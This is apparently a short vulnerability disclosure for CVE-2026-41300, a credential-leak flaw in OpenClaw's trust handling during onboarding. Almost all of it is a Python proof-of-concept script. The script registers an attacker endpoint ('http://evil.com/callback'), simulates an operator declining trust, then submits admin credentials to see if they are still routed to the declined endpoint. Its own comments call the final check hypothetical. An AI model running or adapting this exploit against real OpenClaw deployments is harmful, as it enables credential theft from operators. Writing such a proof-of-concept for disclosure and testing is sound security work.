CVE-2026-41300 OpenClaw信任逻辑漏洞致凭证泄露

import requests # PoC for CVE-2026-41300 # Demonstrates endpoint preservation after trust decline def test_openclaw_vulnerability(target_url, attacker_controlled_url): session = requests.Session() # Step 1: Initiate remote onboarding with attacker's endpoint print("[1] Initiating onboarding with malicious endpoint...") discover_data = {"endpoint": attacker_controlled_url} r = session.post(f"{target_url}/api/onboarding/init", json=discover_data) if r.status_code != 200: print("Failed to initiate onboarding") return # Step 2: Simulate Operator declining the trust request print("[2] Simulating operator declining trust...") decline_data = {"action": "decline", "endpoint": attacker_controlled_url} r = session.post(f"{target_url}/api/onboarding/trust", json=decline_data) # Step 3: Trigger the manual prompt for credential routing # Exploit: Check if credentials are routed to the previously declined endpoint print("[3] Triggering credential routing...") creds_data = {"username": "admin", "password": "secret"} # Monitor the request or check if the attacker_url would be contacted # In a real scenario, the attacker controls the server and logs the incoming request # Here we simulate the check by analyzing the response or internal state if accessible # Hypothetical check: The system might confirm sending to the endpoint r = session.post(f"{target_url}/api/onboarding/apply_creds", json=creds_data) if "sending credentials" in r.text and attacker_controlled_url in r.text: print("[!] Vulnerability Confirmed: Credentials routed to declined endpoint.") return True else: print("[-] Endpoint appears to have been cleared.") return False if __name__ == "__main__": TARGET = "http://localhost:8080" EVIL_URL = "http://evil.com/callback" test_openclaw_vulnerability(TARGET, EVIL_URL)